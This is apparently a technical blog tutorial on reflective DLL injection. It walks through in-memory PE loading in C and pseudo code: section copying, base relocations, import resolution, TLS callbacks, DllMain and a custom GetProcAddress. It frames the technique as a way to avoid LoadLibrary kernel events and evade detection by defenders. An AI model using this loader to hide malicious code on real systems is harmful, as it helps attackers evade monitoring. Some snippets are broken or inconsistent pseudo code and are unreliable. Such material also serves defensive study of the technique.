Reflective DLL Injection
Table of content
- Overview
- Blueprint
- Store the DLL content in memory
- Inject the DLL
- Perform image base relocations
- Process imported functions
- TLS Callback et DLL Main
- GetProcAddress
Overview
The Reflective DLL Injection
is a process injection technique that allows an attacker to inject DLL
stored in memory rather than from the disk.
Indeed, any DLL
stored on disk can be easily loaded using the LoadLibrary
Windows API
. However, this API
does not work when the DLL
content is stored in memory.
Moreover, the LoadLibrary
API
raises some kernel events as it is shown in the following figure:
Using a Reflective DLL Injection
is a way to reimplement a custom LoadLibrary
function that will not raise any kernel events hence limiting detection from the Blue Team
.
Blueprint
The Reflective DLL Injection
can be done through the following steps:
- Store the
DLL
content in memory - Parse the
DLL
header to retrieve theSizeOfImage
value - Allocate a memory space whose size is equal to the
DLL SizeOfImage
- Copy each header and section in the allocated memory space
- Perform image base relocations if needed
- Load dependencies
DLL
ieDLL
used by the loadedDLL
- Resolve imported functions and populate the
Import Address Table (IAT)
- Protect memory sections according to
DLL
's sections needs - Run the
DLL TLS callbacks
- Run the
DLL
main function - Enjoy !
Store the DLL content in memory
This step is quite simple. The goal is to get a buffer with the whole DLL
file's content in it. The following code can be used to load a full file in memory:
BOOL FileExistsW(LPCWSTR szPath){
DWORD dwAttrib = GetFileAttributesW(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
PBYTE ReadFileW(LPCWSTR filename, PDWORD fileSize) {
// Open the file with read permissions
HANDLE hFile = CreateFileW(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
return NULL;
}
// Retrieve the file size
*fileSize = GetFileSize(hFile, NULL);
DWORD sizeRead = 0;
// Allocate size in heap to contains the file content
PBYTE content = (PBYTE)malloc(*fileSize);
// Populate the allocated buffer with the file content
DWORD result = ReadFile(hFile, content, *fileSize, &sizeRead, NULL);
if (!result || sizeRead != *fileSize) {
DEBUG("[x] Error during %ls file read\n", filename);
free(content);
content = NULL;
}
CloseHandle(hFile);
// Return the buffer
return content;
}
So now the whole DLL
content is stored in memory and is ready to be injected.
Inject the DLL
To inject whatever in memory you need to know the global size of the thing you want to inject. For PE
files, such as DLL
, the full file size can be found in the nt headers.
The post goal is not to create a PE
parser so each fields of the PE
will not be explicitly documented in this post.
The full DLL
size can be found with the following code that retrieves the OptionalHeader.SizeOfImage
:
// dllContent is the first byte of the DLL stored in memory
DWORD getImageSize(PVOID dllContent){
IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)((PBYTE)dllContent + pe->dosHeader->e_lfanew);
return ntHeaders->OptionalHeader.SizeOfImage
}
Then, once the full size is known, a memory page is allocated using VirtualAlloc
:
PVOID startAddress = VirtualAlloc(
NULL,
dllParsed->ntHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE
);
So now, the allocated page must be populated with the DLL
's headers and sections:
IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)((PBYTE)dllContent + pe->dosHeader->e_lfanew);
// Copy the headers
CopyMemory(startAddress, dllContent, ntHeader->OptionalHeader.SizeOfHeaders);
// Copy the sections
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(dllParsed->ntHeader);
for (DWORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++, sectionHeader++) {
CopyMemory(
(PBYTE)startAddress + sectionHeader->VirtualAddress,
(PBYTE)dllContent + sectionHeader->PointerToRawData,
sectionHeader->SizeOfRawData
);
}
At the end of these steps, the whole DLL
is loaded in memory at the address startAddress
.
In a better world, this could be the end and the DLL
entry point could be run straight away. However, there is a high probability that your DLL
has not been loaded to its preferred base address.
Thus, several relocations must be done before being able to run you DLL
.
Perform image base relocations
When a PE
is compiled, the symbols are referenced as if the PE
is loaded at a given base address. This address is the PE
preferred loading address or the ImageBase
address.
If the PE
is not loaded to its preferred ImageBase
address, the load address shift breaks all absolute references among the PE
.
For example, if the PE
has been compiled to reference the data A
from the address 0x40000
, this reference only works if the PE
is loaded to the same base address as the one used during compilation. If the PE
is loaded to another base address, the reference 0x40000
will not point to the A
data anymore but to an arbitrary data in the process memory space. The A
data will be stored at 0x4000 + offset
where the offset is the difference between the current loading address and the preferred ImageBase
address.
The .reloc
section contains all the hardcoded absolute references that need fixing if the PE
is not loaded at its preferred base address.
In a nutshell, symbols referenced by their absolute address are not hardcoded into the .text
section. Their references in the .text
section point to the .reloc
section. The .reloc
section is used as a lookup table between the symbol reference in .text
and its absolute definition address.
Symbol Table
The .reloc
section contains the Relocation Table
. This table is divided into blocks that represents the base relocation.
The start address for the Relocation Table
can be retrieved in the PE
DataDirectory
located in the NtHeader
's OptionalHeader
parameter:
PVOID firstRelocationBlock = ntHeader->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
Each block starts with an IMAGE_BASE_RELOCATION
and is followed by any number of offsets and field entries.
The IMAGE_BASE_RELOCATION
part can be parsed using the following structure:
typedef struct _IMAGE_BASE_RELOCATION {
DWORD VirtualAddress;
DWORD SizeOfBlock;
} IMAGE_BASE_RELOCATION;
The different relocation entries can be iterated from the VirtualAddress
address to the VirtualAddress + SizeOfBlock
address. So, once the IMAGE_BASE_RELOCATION
object is extracted from the relocation table block, it can be used to access to the relocation entries as the relocation table structure can be seen as follows:
The different IMAGE_BASE_RELOCATION
can be iterated using the following code:
//pseudo code
IMAGE_BASE_RELOCATION* currentRelocation = firstRelocationBlock
while(currentRelocation->VirtualAddress){
// Process the current relocation block
...
// Jump to the next relocation block
currentRelocation = (PBYTE)currentRelocation + currentRelocation->SizeOfBlock;
}
So now, it is needed to access to each relocation block's entry. These entries can be parsed using the following structure:
typedef struct _IMAGE_RELOCATION_ENTRY {
WORD Offset : 12;
WORD Type : 4;
} IMAGE_RELOCATION_ENTRY;
Each entry contained in the relocation block can be parsed using the following code:
// pseudo code
// IMAGE_BASE_RELOCATION *currentRelocation : the current relocation block
IMAGE_RELOCATION_ENTRY* relocationEntry = ¤tRelocation[1];
while ((DWORD64)relocationEntry < (DWORD64)currentRelocation + currentRelocation->SizeOfBlock){
// process the relocation
...
// jump to the next entry
relocationEntry++;
}
So, to summarize, the following code can be used to parse a full relocation table:
//pseudo code
IMAGE_BASE_RELOCATION* currentRelocation = ntHeader->OptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
while(currentRelocation->VirtualAddress){
// process the current relocation block
IMAGE_RELOCATION_ENTRY* relocationEntry = ¤tRelocation[1];
while ((DWORD64)relocationEntry < (DWORD64)currentRelocation + currentRelocation->SizeOfBlock){
// process the relocation
...
// jump to the next entry
relocationEntry++;
}
// jump to the next relocation block
currentRelocation = (PBYTE)currentRelocation + currentRelocation->SizeOfBlock;
}
Perform relocation
Performing a relocation is modifying the Relocation Table
entries and add an offset equal to the difference of the PE
preferred load address and the real PE
load address.
So, the relocation
address must be found, and its content must be updated. In order to update the relocation
content, the relocation
type must be taken into account. Indeed, depending on the relocation type, the modification can be handled differently:
Name | Value | Description |
---|---|---|
IMAGE_REL_BASED_ABSOLUTE | 0x00 | The relocation is skipped. It is often used to pad a block |
IMAGE_REL_BASED_HIGH | 0x01 | The 16 high bits of the offset is added to the current relocation value |
IMAGE_REL_BASED_LOW | 0x03 | The 16 low bits of the offset is added to the current relocation value |
IMAGE_REL_BASED_HIGHLOW | 0x04 | The 32 bits of the offset is added to the current relocation value |
IMAGE_REL_BASED_DIR64 | 0x10 | The 64 bits of the offset is added to the current relocation value |
The following code can be used to handle the relocations:
// pseudo code
// PVOID startAddress : the actual PE load address
// IMAGE_BASE_RELOCATION* currentRelocation : the actual relocation block
// Compute the offset
DWORD64 offset = startAddress - ntHeader->OptionalHeader.ImageBase;
// Get the first relocation entry in the block
IMAGE_RELOCATION_ENTRY* relocationEntry = ¤tRelocation[1];
// Parse all relocation entry in the relocation block
while(relocationEntry < currentRelocation + currentRelocation->SizeOfBlock){
// Get the relocation address
DWORD64 relocationRVA = currentRelocation->VirtualAddress + relocationEntry->Offset;
DWORD64 *relocationAddress = startAddress + relocationRVA;
// Process the relocation
switch(relocationEntry->Type){
case IMAGE_REL_BASED_HIGH:
// 16 high bits
*relocationAddress += HIWORD(offset);
break;
case IMAGE_REL_BASED_LOW:
// 16 low bits
*relocationAddress += LOWORD(offset);
break;
case IMAGE_REL_BASED_HIGHLOW:
// 32 bits
*relocationAddress += (DWORD)offset;
break;
case IMAGE_REL_BASED_DIR64:
// 64 bits
*relocationAddress += offset;
break;
default:
break;
}
relocationEntry ++;
}
Thus, at this moment, all relocations had been performed and the program should work whatever its load address.
However, what happens if the DLL
uses functions defined in another DLL
? In this case, the DLL
must be imported and the functions address must be resolved.
Process imported functions
DLL
have dependencies. Indeed, the DLL
could use functions defined in other DLL
. For example, the KERNEL32.DLL
has the NTDLL.DLL
as dependencies : VirtualAlloc
will call NtAllocateVirtualMemory
.
Thus, these references must also be resolved.
Import Directory Table
The Import Directory Table
is located in the .idata
section and contains one entry for every DLL
used by the PE
.
The Import Directory Table
entry can be parsed using the following structure:
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
} DUMMYUNIONNAME;
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
è
Once the DLL
name is known, it must be loaded using a recursive call or using LoadLibrary
. However, the use of LoadLibrary
is kind of problematic as it will raise several kernel events.
Then, the ILT
must be parsed to fill the IAT
.
IAT and ILT
The IAT
is a table that will contain the address of the resolved symbols ie the function addresses resolved through GetProcAddress
. This table is usually empty when the process start and is filled depending on the ILT
information.
The ILT
is a lookup table containing information about the imported function such as its name, its ordinal etc... The ILT
information is used to resolve the imported function address that will be stored in the IAT
.
The ILT
and IAT
entries can be parsed using the following structure:
typedef struct _IMAGE_THUNK_DATA {
union {
ULONGLONG ForwarderString;
ULONGLONG Function;
ULONGLONG Ordinal;
ULONGLONG AddressOfData;
} u1;
} IMAGE_THUNK_DATA;
For the ILT
the interesting parameters are :
- The
AddressOfData
parameter that contains the function nameRVA
. This address points to theIMAGE_IMPORT_BY_NAME
structure that can be used to retrieve the function name as a simple string. This string can then be used withGetProcAddress
to retrieve the function address. - The
Ordinal
parameter that contains the function ordinal and can be used to resolve the function address throughGetProcAddress
For the IAT
the interesting parameter is :
- The
Function
parameter that will receive the function resolved address
Thus, the idea is to parse the while ILT
, use the AddressOfData
or Ordinal
parameter to resolve the function address and write it in the IAT's Function
value.
Fill the IAT
The following code can be used to process the imported functions:
// pseudo code
// Get the first Import Directory Table entry
IMAGE_IMPORT_DESCRIPTOR* importDescriptor = startAddress + ntHeaders->OptionalHeader->dataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
// Iterate through all Import Directory Table entries
for (SIZE_T i = 0; importDescriptor->Name; importDescriptor++) {
// Get the IAT and ILT first entry
PIMAGE_THUNK_DATA iat = startAddress + importDescriptor->FirstThunk;
PIMAGE_THUNK_DATA ilt = startAddress + importDescriptor->OriginalFirstThunk;
// Get the associated DLL name
char* dllName = startAddress + importDescriptor->Name;
// Load the DLL
// For clean read, the LoadLibrary function is used
HMODULE dllHandle = GetModuleHandleA(dllName);
if (!dllHandle) {
dllHandle = LoadLibraryExA(dllName, NULL, NULL);
if (!dllHandle) {
return FALSE;
}
}
// Iterate through the ILT entries
for (; ilt->u1.Function; iat++, ilt++) {
// Check if the function is given as an ordinal
if (IMAGE_SNAP_BY_ORDINAL(ilt->u1.Ordinal)) {
// Resolve function name through its ordinal
LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(ilt->u1.Ordinal);
// Write function address into the IAT's corresponding entry
iat->u1.Function = (DWORD_PTR)GetProcAddress(dllHandle, functionOrdinal);
}
else {
// Load the HINT structure from the ILT information
// The HINT structure contains address to the function name
IMAGE_IMPORT_BY_NAME* hint = startAddress + ilt->u1.AddressOfData;
// Write function address into the IAT's correspond entry
iat->u1.Function = GetProcAddress(dllHandle, hint->Name);
}
}
}
At this moment, the DLL
dependencies are loaded.
Delayed Import Table
The Delayed Import Table
works exactly like the standard Import Directory Table
. This table has been added to support an uniform mechanism for applications to delay the DLL
until one of its exported functions is used.
To avoid any problem, this table will be processed exactly as the Import Directory Table
. The only difference is that this table entries will be parsed using the following structure:
typedef struct _IMAGE_DELAYLOAD_DESCRIPTOR {
union {
DWORD AllAttributes;
struct {
DWORD RvaBased : 1;
DWORD ReservedAttributes : 31;
} DUMMYSTRUCTNAME;
} Attributes;
DWORD DllNameRVA;
DWORD ModuleHandleRVA;
DWORD ImportAddressTableRVA;
DWORD ImportNameTableRVA;
DWORD BoundImportAddressTableRVA;
DWORD UnloadInformationTableRVA;
DWORD TimeDateStamp;
} IMAGE_DELAYLOAD_DESCRIPTOR
The DLLNameRVA
value contains the RVA
to the DLL
name.
The ImportAddressTableRVA
contains the IAT
's RVA
. Likewise, the ImportNameTableRVA
contains the ILT
's RVA
.
Besides, nothing changes and the previous code used to parse the Import Directory Table
can be used as is.
TLS Callback et DLL Main
TLS Callback
The TLS Callback
are function ran before the entry point. They are often used by malware as anti-debug techniques but also by legit DLL
to set up the environment.
Before running the DLL main
, these callbacks must be run. They can be found in the PE
DataDirectory
in the Entry TLS
parameter. The following code can be used to run these functions:
// pseudo code
// Check if any TLS callback is defined
if (dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].Size) {
// Get the TLS information
PIMAGE_TLS_DIRECTORY tlsDir = startAddress + dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress
// Get the TLS function address
PIMAGE_TLS_CALLBACK* callback = (PIMAGE_TLS_CALLBACK*)(tlsDir->AddressOfCallBacks);
for (; *callback; callback++) {
// Call the function
(*callback)((PVOID)dllParsed->baseAddress, DLL_PROCESS_ATTACH, NULL);
}
}
DLL Main
The DLL main
function is the function called when the DLL
is loaded by the system. The following code is an example of DLL Main
:
BOOL WINAPI DllMain(
HINSTANCE hinstDLL, // handle to DLL module
DWORD fdwReason, // reason for calling function
LPVOID lpvReserved ) // reserved
{
// Perform actions based on the reason for calling.
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
// Initialize once for each new process.
// Return FALSE to fail DLL load.
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
if (lpvReserved != nullptr)
{
break; // do not do cleanup if process termination scenario
}
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
When the DLL
is loaded, the event DLL_PROCESS_ATTACH
is used. The following code can be used to call the DLL
main:
// pseudo code
typedef BOOL(WINAPI* LPDLLMAIN)(DWORD_PTR image_base, DWORD reason, LPVOID reserved);
LPDLLMAIN entryPoint = (LPDLLMAIN)startAddress + dllParsed->ntHeader->OptionalHeader.AddressOfEntryPoint);
if(entrypoint) {
BOOL status = entryPoint((HINSTANCE)dllParsed->baseAddress, DLL_PROCESS_ATTACH, NULL);
}
From now, the DLL
should be fully loaded and the exported function can be used.
GetProcAddress
The Windows
GetProcAddress
will not work with the loaded DLL
and I wasn't able to understand why. Indeed, the GetProcAddress
function requires a handle to the DLL
(HMODULE
). The HMODULE
type simply represents the DLL
base address. However, even when the loaded DLL
base address is given to the GetProcAddress
function, it cannot find the exported function.
Thus, a custom GetProcAddress
function must be developed.
The PE
header contains all the information needed to access to the exported function name and addresses. Indeed, the DataDirectory
contains the ExportDirectory
address that can be used to access to the AddressOfFunctions
, AddressOfNames
and AddressOfNameOrdinals
tables.
The AddressOfNames
is a table containing the names of the exported functions.
The AddressOfFunctions
is a table containing the address of the exported functions.
The AddressOfNameOrdinals
is a lookup table used to link the names from the AddressOfNames
to the address from the AddressOfFunctions
.
The following code can be used as a custom GetProcAddress
:
// pseudo code
DWORD exportDirectoryRVA = (DWORD)dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
IMAGE_EXPORT_DIRECTORY exportDirectory = startAddress + exportDirectoryRVA;
LPDWORD AddressOfFunctions = startAddress + exportDirectory->AddressOfFunctions;
LPDWORD AddressOfNames = startAddress + exportDirectory->AddressOfNames;
LPWORD AddressOfNameOrdinals = startAddress + exportDirectory->AddressOfNameOrdinals;
for (SIZE_T i = 0; i < exportDirectory->NumberOfFunctions; i++) {
char *name = (char*)((DWORD64)startAddress + AddressOfNames[i]);
if (strcmp(name, functionName) == 0) {
DWORD64 functionRVA = AddressOfFunctions[AddressOfNameOrdinals[i]];
return startAddress + functionRVA;
}
}